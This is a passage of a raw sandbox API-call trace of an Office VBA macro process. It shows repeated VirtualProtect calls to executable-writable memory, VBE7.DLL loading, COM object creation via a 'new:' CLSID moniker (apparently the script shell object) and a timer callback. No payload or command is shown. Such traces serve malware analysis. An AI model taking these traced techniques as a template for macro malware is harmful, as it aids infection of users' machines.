GetCurrentProcess () returned 0xffffffff [0112.081] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0112.081] GetCurrentProcess () returned 0xffffffff [0112.081] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0112.081] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.081] GetCurrentProcess () returned 0xffffffff [0112.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0112.082] GetCurrentProcess () returned 0xffffffff [0112.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0112.082] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.082] GetCurrentProcess () returned 0xffffffff [0112.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0112.082] GetCurrentProcess () returned 0xffffffff [0112.082] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0112.082] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.083] GetCurrentProcess () returned 0xffffffff [0112.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0112.083] GetCurrentProcess () returned 0xffffffff [0112.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0112.083] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.083] GetCurrentProcess () returned 0xffffffff [0112.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0112.083] GetCurrentProcess () returned 0xffffffff [0112.083] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0112.083] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.084] GetCurrentProcess () returned 0xffffffff [0112.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0112.084] GetCurrentProcess () returned 0xffffffff [0112.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0112.084] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.084] GetCurrentProcess () returned 0xffffffff [0112.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0112.084] GetCurrentProcess () returned 0xffffffff [0112.084] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0112.084] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.085] GetCurrentProcess () returned 0xffffffff [0112.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0112.085] GetCurrentProcess () returned 0xffffffff [0112.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0112.085] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.085] GetCurrentProcess () returned 0xffffffff [0112.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0112.085] GetCurrentProcess () returned 0xffffffff [0112.085] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0112.086] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.086] GetCurrentProcess () returned 0xffffffff [0112.086] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0112.086] GetCurrentProcess () returned 0xffffffff [0112.086] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0112.086] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.086] GetCurrentProcess () returned 0xffffffff [0112.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0112.087] GetCurrentProcess () returned 0xffffffff [0112.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0112.087] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.087] GetCurrentProcess () returned 0xffffffff [0112.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0112.087] GetCurrentProcess () returned 0xffffffff [0112.087] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0112.087] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.088] GetCurrentProcess () returned 0xffffffff [0112.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0112.088] GetCurrentProcess () returned 0xffffffff [0112.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0112.088] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.088] GetCurrentProcess () returned 0xffffffff [0112.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0112.088] GetCurrentProcess () returned 0xffffffff [0112.088] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0112.088] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.089] GetCurrentProcess () returned 0xffffffff [0112.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0112.089] GetCurrentProcess () returned 0xffffffff [0112.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0112.089] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.089] GetCurrentProcess () returned 0xffffffff [0112.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0112.089] GetCurrentProcess () returned 0xffffffff [0112.089] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0112.089] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.092] GetCurrentProcess () returned 0xffffffff [0112.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0112.092] GetCurrentProcess () returned 0xffffffff [0112.092] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0112.092] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.093] GetCurrentProcess () returned 0xffffffff [0112.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0112.093] GetCurrentProcess () returned 0xffffffff [0112.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0112.093] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.093] GetCurrentProcess () returned 0xffffffff [0112.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0112.093] GetCurrentProcess () returned 0xffffffff [0112.093] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0112.093] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.094] GetCurrentProcess () returned 0xffffffff [0112.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0112.094] GetCurrentProcess () returned 0xffffffff [0112.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0112.094] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.094] GetCurrentProcess () returned 0xffffffff [0112.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0112.094] GetCurrentProcess () returned 0xffffffff [0112.094] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0112.095] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.095] GetCurrentProcess () returned 0xffffffff [0112.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0112.095] GetCurrentProcess () returned 0xffffffff [0112.095] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0112.095] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0112.096] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0112.096] GetCurrentProcess () returned 0xffffffff [0112.096] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0112.096] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.097] GetCurrentProcess () returned 0xffffffff [0112.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0112.097] GetCurrentProcess () returned 0xffffffff [0112.097] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0112.097] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1971ac | out: lpflOldProtect=0x1971ac*=0x40) returned 1 [0112.097] GetCurrentProcess () returned 0xffffffff [0112.098] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0112.098] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.098] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0112.098] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x681f0000 [0112.098] SetErrorMode (uMode=0x8001) returned 0x8001 [0112.098] GetProcAddress (hModule=0x681f0000, lpProcName=0x272) returned 0x683e533a [0112.099] GetAsyncKeyState (vKey=3) returned 0 [0112.099] GetAsyncKeyState (vKey=3) returned 0 [0112.099] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.099] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.099] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.099] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0112.099] VarCmp (pvarLeft=0x19798c, pvarRight=0x19797c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0112.100] CreateBindCtx (in: reserved=0x0, ppbc=0x1977f8 | out: ppbc=0x1977f8*=0xcac1990) returned 0x0 [0112.100] MkParseDisplayName (in: pbc=0xcac1990, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x1977fc, ppmk=0x197800 | out: pchEaten=0x1977fc, ppmk=0x197800*=0xcabfe10) returned 0x0 [0112.996] IUnknown:Release (This=0xcac1990) returned 0x0 [0112.997] BindMoniker (in: pmk=0xcabfe10, grfOpt=0x0, iidResult=0x68408088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1977f4 | out: ppvResult=0x1977f4*=0x8ceb67c) returned 0x0 [0113.971] IUnknown:Release (This=0xcabfe10) returned 0x0 [0113.971] GetAsyncKeyState (vKey=3) returned 0 [0113.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197b9c | out: ppsaOut=0x197b9c) returned 0x0 [0113.975] SafeArrayAllocData (psa=0xc849410) returned 0x0 [0113.985] SafeArrayDestroyData (psa=0xc849410) returned 0x0 [0113.985] SafeArrayDestroyDescriptor (psa=0xc849410) returned 0x0 [0113.990] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.990] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0113.990] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0113.991] SetErrorMode (uMode=0x8001) returned 0x8001 [0113.991] GetProcAddress (hModule=0x743d0000, lpProcName="SetTimer") returned 0x743eee50 [0113.991] SetTimer (hWnd=0x0, nIDEvent=0x11944020, uElapse=0x1, lpTimerFunc=0x11944020) returned 0x7f75 [0113.991] GetLastError () returned 0x0 [0113.992] CRetailMalloc_Alloc () returned 0xcb058e8 [0113.992] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.992] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d52f7e, cbMultiByte=7, lpWideCharStr=0x1976c4, cchWideChar=8 | out: lpWideCharStr="––—––—") returned 7 [0113.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10a4a, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––—––—") returned 7 [0113.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10a4a, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––—––—") returned 7 [0113.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10a4a, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––—––—") returned 7 [0113.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10a4a, cbMultiByte=7, lpWideCharStr=0x197724, cchWideChar=8 | out: lpWideCharStr="––—––—") returned 7 [0113.993] CRetailMalloc_Alloc () returned 0xca95278 [0113.993] _mbscpy_s (in: _Dst=0xca95278, _DstSizeInBytes=0x7, _Src=0x9d10a4a | out: _Dst=0xca95278) returned 0x0 [0113.994] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d10cda, cbMultiByte=14, lpWideCharStr=0x197734, cchWideChar=15 | out: lpWideCharStr="_B_var_––—––—") returned 14 [0113.994] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x7, _Src=0x9d10a4a | out: _Dst=0x19779c) returned 0x0 [0113.994] CRetailMalloc_Free () returned 0x1 [0113.994] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0113.994] memcpy (in: _Dst=0xaf516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0113.994] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.994] memcpy (in: _Dst=0xaf5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xaf5270) returned 0xaf5270 [0113.994] memcpy (in: _Dst=0xaf5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.994] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9d50922, cbMultiByte=9, lpWideCharStr=0x1976c4, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0113.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9c30922, cbMultiByte=9, lpWideCharStr=0x197724, cchWideChar=10 | out: lpWideCharStr="DoEvents") returned 9 [0113.995] memcpy (in: _Dst=0xaf5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.995] memcpy (in: _Dst=0xaf516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xaf516c) returned 0xaf516c [0113.995] memcpy (in: _Dst=0xaf5168, _Src=0x197888, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0113.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6842ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0113.996] memcpy (in: _Dst=0xcb05950, _Src=0x197944, _Size=0x18 | out: _Dst=0xcb05950) returned 0xcb05950 [0113.996] CRetailMalloc_Realloc () returned 0xcb058e8 [0113.996] CRetailMalloc_Free () returned 0x1 [0113.996] GetCurrentProcess () returned 0xffffffff [0113.996] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0113.996] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.997] GetCurrentProcess () returned 0xffffffff [0113.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0113.997] GetCurrentProcess () returned 0xffffffff [0113.997] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0113.997] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.998] GetCurrentProcess () returned 0xffffffff [0113.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0113.998] GetCurrentProcess () returned 0xffffffff [0113.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0113.998] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.998] GetCurrentProcess () returned 0xffffffff [0113.998] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0113.998] GetCurrentProcess () returned 0xffffffff [0113.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0113.999] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0113.999] GetCurrentProcess () returned 0xffffffff [0113.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0113.999] GetCurrentProcess () returned 0xffffffff [0113.999] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0113.999] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.000] GetCurrentProcess () returned 0xffffffff [0114.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0114.000] GetCurrentProcess () returned 0xffffffff [0114.000] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0114.000] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.000] GetCurrentProcess () returned 0xffffffff [0114.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0114.001] GetCurrentProcess () returned 0xffffffff [0114.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0114.001] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.001] GetCurrentProcess () returned 0xffffffff [0114.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0114.001] GetCurrentProcess () returned 0xffffffff [0114.001] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0114.001] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.002] GetCurrentProcess () returned 0xffffffff [0114.002] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0114.002] GetCurrentProcess () returned 0xffffffff [0114.002] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0114.002] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.002] GetCurrentProcess () returned 0xffffffff [0114.002] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0114.002] GetCurrentProcess () returned 0xffffffff [0114.003] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0114.003] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.003] GetCurrentProcess () returned 0xffffffff [0114.003] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0114.003] GetCurrentProcess () returned 0xffffffff [0114.003] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0114.003] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.004] GetCurrentProcess () returned 0xffffffff [0114.004] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0114.004] GetCurrentProcess () returned 0xffffffff [0114.004] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0114.004] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.005] GetCurrentProcess () returned 0xffffffff [0114.005] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0114.005] GetCurrentProcess () returned 0xffffffff [0114.005] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0114.005] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.005] GetCurrentProcess () returned 0xffffffff [0114.005] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0114.005] GetCurrentProcess () returned 0xffffffff [0114.005] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0114.005] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.006] GetCurrentProcess () returned 0xffffffff [0114.006] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0114.006] GetCurrentProcess () returned 0xffffffff [0114.006] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0114.006] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.007] GetCurrentProcess () returned 0xffffffff [0114.007] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0114.007] GetCurrentProcess () returned 0xffffffff [0114.007] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0114.007] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.008] GetCurrentProcess () returned 0xffffffff [0114.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0114.008] GetCurrentProcess () returned 0xffffffff [0114.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0114.008] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0114.008] GetCurrentProcess () returned 0xffffffff [0114.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0114.008] GetCurrentProcess () returned 0xffffffff [0114.008] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0114.009] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, 